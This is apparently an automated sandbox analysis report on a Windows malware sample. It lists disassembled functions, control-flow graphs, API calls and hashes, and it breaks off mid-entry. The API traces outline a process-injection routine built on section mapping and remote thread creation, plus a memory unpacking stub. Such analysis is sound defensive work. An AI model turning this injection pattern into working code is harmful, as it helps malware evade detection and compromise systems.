                                                • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                                • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24
                                                Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 349 401543-401544 350 401546-401567 349->350 351 4015af-4015b1 349->351 360 401558-401563 350->360 361 40156a-401590 call 4011b7 350->361 353 4018b6-4018c5 351->353 354 4015b7-4015e0 351->354 357 4018da 353->357 358 4018cb-4018d6 353->358 354->353 370 4015e6-4015fd NtDuplicateObject 354->370 357->358 362 4018dd-401915 call 4011b7 357->362 358->362 360->361 378 401592 361->378 379 401595-40159a 361->379 370->353 373 401603-401627 NtCreateSection 370->373 375 401683-4016a9 NtCreateSection 373->375 376 401629-40164a NtMapViewOfSection 373->376 375->353 382 4016af-4016b3 375->382 376->375 380 40164c-401668 NtMapViewOfSection 376->380 378->379 391 4015a0-4015ad 379->391 392 4018b8-4018c0 379->392 380->375 383 40166a-401680 380->383 382->353 385 4016b9-4016da NtMapViewOfSection 382->385 383->375 385->353 388 4016e0-4016fc NtMapViewOfSection 385->388 388->353 393 401702 call 401707 388->393 391->351 392->379
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                                • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64
                                                Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 397 401565-401590 call 4011b7 402 401592 397->402 403 401595-40159a 397->403 402->403 405 4015a0-4015b1 403->405 406 4018b8-4018c0 403->406 410 4018b6-4018c5 405->410 411 4015b7-4015e0 405->411 406->403 413 4018da 410->413 414 4018cb-4018d6 410->414 411->410 420 4015e6-4015fd NtDuplicateObject 411->420 413->414 416 4018dd-401915 call 4011b7 413->416 414->416 420->410 422 401603-401627 NtCreateSection 420->422 423 401683-4016a9 NtCreateSection 422->423 424 401629-40164a NtMapViewOfSection 422->424 423->410 428 4016af-4016b3 423->428 424->423 426 40164c-401668 NtMapViewOfSection 424->426 426->423 429 40166a-401680 426->429 428->410 431 4016b9-4016da NtMapViewOfSection 428->431 429->423 431->410 433 4016e0-4016fc NtMapViewOfSection 431->433 433->410 436 401702 call 401707 433->436
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                                • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64
                                                Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 438 401579-401590 call 4011b7 444 401592 438->444 445 401595-40159a 438->445 444->445 447 4015a0-4015b1 445->447 448 4018b8-4018c0 445->448 452 4018b6-4018c5 447->452 453 4015b7-4015e0 447->453 448->445 455 4018da 452->455 456 4018cb-4018d6 452->456 453->452 462 4015e6-4015fd NtDuplicateObject 453->462 455->456 458 4018dd-401915 call 4011b7 455->458 456->458 462->452 464 401603-401627 NtCreateSection 462->464 465 401683-4016a9 NtCreateSection 464->465 466 401629-40164a NtMapViewOfSection 464->466 465->452 470 4016af-4016b3 465->470 466->465 468 40164c-401668 NtMapViewOfSection 466->468 468->465 471 40166a-401680 468->471 470->452 473 4016b9-4016da NtMapViewOfSection 470->473 471->465 473->452 475 4016e0-4016fc NtMapViewOfSection 473->475 475->452 478 401702 call 401707 475->478
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                                • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64
                                                Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 480 40157c-401590 call 4011b7 484 401592 480->484 485 401595-40159a 480->485 484->485 487 4015a0-4015b1 485->487 488 4018b8-4018c0 485->488 492 4018b6-4018c5 487->492 493 4015b7-4015e0 487->493 488->485 495 4018da 492->495 496 4018cb-4018d6 492->496 493->492 502 4015e6-4015fd NtDuplicateObject 493->502 495->496 498 4018dd-401915 call 4011b7 495->498 496->498 502->492 504 401603-401627 NtCreateSection 502->504 505 401683-4016a9 NtCreateSection 504->505 506 401629-40164a NtMapViewOfSection 504->506 505->492 510 4016af-4016b3 505->510 506->505 508 40164c-401668 NtMapViewOfSection 506->508 508->505 511 40166a-401680 508->511 510->492 513 4016b9-4016da NtMapViewOfSection 510->513 511->505 513->492 515 4016e0-4016fc NtMapViewOfSection 513->515 515->492 518 401702 call 401707 515->518
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                                • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64
                                                Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 520 402fe9-40300d 521 403140-403145 520->521 522 403013-40302b 520->522 522->521 523 403031-403042 522->523 524 403044-40304d 523->524 525 403052-403060 524->525 525->525 526 403062-403069 525->526 527 40308b-403092 526->527 528 40306b-40308a 526->528 529 4030b4-4030b7 527->529 530 403094-4030b3 527->530 528->527 531 4030c0 529->531 532 4030b9-4030bc 529->532 530->529 531->524 533 4030c2-4030c7 531->533 532->531 534 4030be 532->534 533->521 535 4030c9-4030cc 533->535 534->533 535->521 536 4030ce-40313d RtlCreateUserThread NtTerminateProcess 535->536 536->521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: CreateProcessTerminateThreadUser
                                                • String ID:
                                                • API String ID: 1921587553-0
                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5
                                                Function 00417C57 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 167timelibraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CD8
                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417CEF
                                                • GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 00417CF8
                                                • AreFileApisANSI.KERNEL32 ref: 00417CFE
                                                • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00417D06
                                                • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00417D0F
                                                • GetCommMask.KERNELBASE(00000000,00000000), ref: 00417D3F
                                                • GetLastError.KERNEL32 ref: 00417D45
                                                • ZombifyActCtx.KERNEL32(00000000), ref: 00417D58
                                                • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00417D67
                                                • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00417D8C
                                                • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00417D95
                                                  • Part of subcall function 004179AD: LocalAlloc.KERNELBASE(00000000,00417DE5), ref: 004179B5
                                                • LoadLibraryA.KERNELBASE(004193D8), ref: 00417E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: ConsoleTimerWaitable$AliasesAllocApisAtomCommCreateDateDecrementEnumErrorFileFormatsInterlockedLastLibraryLoadLocalMaskMountNameOpenPointVolumeWriteZombify
                                                • String ID: tl_$}$
                                                • API String ID: 1277400812-2845185508
                                                • Opcode ID: 51d45e83e475c99cd7aa5bd50a4591079eb361b0ed041a489ec9c850fbcfa93b
                                                • Instruction ID: 05c418657806d1e3c5604e16026e84f417cc0deeb5e126f930ec35500030948a
                                                • Opcode Fuzzy Hash: 51d45e83e475c99cd7aa5bd50a4591079eb361b0ed041a489ec9c850fbcfa93b
                                                • Instruction Fuzzy Hash: 2F51C4705051289BC721AB21ED499DF3BB8EF09354B11847EF105E2161DB3C4DC6CBAD
                                                Function 005A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 53 5a003c-5a0047 54 5a0049 53->54 55 5a004c-5a0263 call 5a0a3f call 5a0e0f call 5a0d90 VirtualAlloc 53->55 54->55 70 5a028b-5a0292 55->70 71 5a0265-5a0289 call 5a0a69 55->71 72 5a02a1-5a02b0 70->72 74 5a02ce-5a03c2 VirtualProtect call 5a0cce call 5a0ce7 71->74 72->74 75 5a02b2-5a02cc 72->75 82 5a03d1-5a03e0 74->82 75->72 83 5a0439-5a04b8 VirtualFree 82->83 84 5a03e2-5a0437 call 5a0ce7 82->84 86 5a04be-5a04cd 83->86 87 5a05f4-5a05fe 83->87 84->82 88 5a04d3-5a04dd 86->88 89 5a077f-5a0789 87->89 90 5a0604-5a060d 87->90 88->87 92 5a04e3-5a0505 88->92 93 5a078b-5a07a3 89->93 94 5a07a6-5a07b0 89->94 90->89 95 5a0613-5a0637 90->95 104 5a0517-5a0520 92->104 105 5a0507-5a0515 92->105 93->94 97 5a086e-5a08be LoadLibraryA 94->97 98 5a07b6-5a07cb 94->98 99 5a063e-5a0648 95->99 103 5a08c7-5a08f9 97->103 101 5a07d2-5a07d5 98->101 99->89 102 5a064e-5a065a 99->102 106 5a07d7-5a07e0 101->106 107 5a0824-5a0833 101->107 102->89 108 5a0660-5a066a 102->108 109 5a08fb-5a0901 103->109 110 5a0902-5a091d 103->110 111 5a0526-5a0547 104->111 105->111 112 5a07e2 106->112 113 5a07e4-5a0822 106->113 115 5a0839-5a083c 107->115 114 5a067a-5a0689 108->114 109->110 116 5a054d-5a0550 111->116 112->107 113->101 117 5a068f-5a06b2 114->117 118 5a0750-5a077a 114->118 115->97 119 5a083e-5a0847 115->119 121 5a05e0-5a05ef 116->121 122 5a0556-5a056b 116->122 123 5a06ef-5a06fc 117->123 124 5a06b4-5a06ed 117->124 118->99 125 5a084b-5a086c 119->125 126 5a0849 119->126 121->88 127 5a056f-5a057a 122->127 128 5a056d 122->128 129 5a074b 123->129 130 5a06fe-5a0748 123->130 124->123 125->115 126->97 132 5a059b-5a05bb 127->132 133 5a057c-5a0599 127->133 128->121 129->114 130->129 137 5a05bd-5a05db 132->137 133->137 137->116
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005A024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5a0000_ajjwvsd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: 339b6381adfffe255570805e1953e9d3465a61c11f423d1475d0b3c283b03e5d
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 3B526874A11229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14
                                                Function 0046A2FF Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 537 46a2ff-46a318 538 46a31a-46a31c 537->538 539 46a323-46a32f CreateToolhelp32Snapshot 538->539 540 46a31e 538->540 541 46a331-46a337 539->541 542 46a33f-46a34c Module32First 539->542 540->539 541->542 548 46a339-46a33d 541->548 543 46a355-46a35d 542->543 544 46a34e-46a34f call 469fbe 542->544 549 46a354 544->549 548->538 548->542 549->543
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0046A327
                                                • Module32First.KERNEL32(00000000,00000224), ref: 0046A347
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, Offset: 00467000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_467000_ajjwvsd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 2cc7809517e2dcc175924557c930e1ef9f622d7324e5d44df8fefa2c4b08ccf1
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: F0F0FC321007106FD7203BF5988CB6F72ECAF49324F100129EA42E12C0E774EC454A57
                                                Function 005A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 550 5a0e0f-5a0e24 SetErrorMode * 2 551 5a0e2b-5a0e2c 550->551 552 5a0e26 550->552 552->551
                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,005A0223,?,?), ref: 005A0E19
                                                • SetErrorMode.KERNELBASE(00000000,?,?,005A0223,?,?), ref: 005A0E1E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5a0000_ajjwvsd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: ce7575169f36a7c85206fcae42e0fcb861aa2e687c756cbd9285e154151780ed
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 18D0123114512877DB002A94DC09BCD7F1CDF09B62F008411FB0DD9080C770994046E5
                                                Function 004179CC Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 553 4179cc-4179e9 VirtualProtect
                                                APIs
                                                • VirtualProtect.KERNELBASE(00000040,?), ref: 004179E2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: cba572e7f36d69fd621d82a340d50add2c2981a162f38f0641d48c01d346696d
                                                • Instruction ID: 55a1a841f0e4b6d1ed6018a3982979d51180b0568af62e4b39049d3d9c283280
                                                • Opcode Fuzzy Hash: cba572e7f36d69fd621d82a340d50add2c2981a162f38f0641d48c01d346696d
                                                • Instruction Fuzzy Hash: 00C08C71240109BFCB11CB81ED02E963B6DEB00204F408070B301A21F0D2B1AD119B2C
                                                Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                                • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                                Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                                • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                                Function 00469FBE Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0046A00F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, Offset: 00467000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_467000_ajjwvsd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: f1e9479aa311fb76d2b2858f509a69ac9318a541669ec6b33becbc46499daf57
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: A7113F79A00208EFDB01DF98C985E99BBF5EF08350F058095F948AB362E375EA50DF95
                                                Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                                • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                                Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                                • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                                Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                Download Yara Rule
                                                APIs
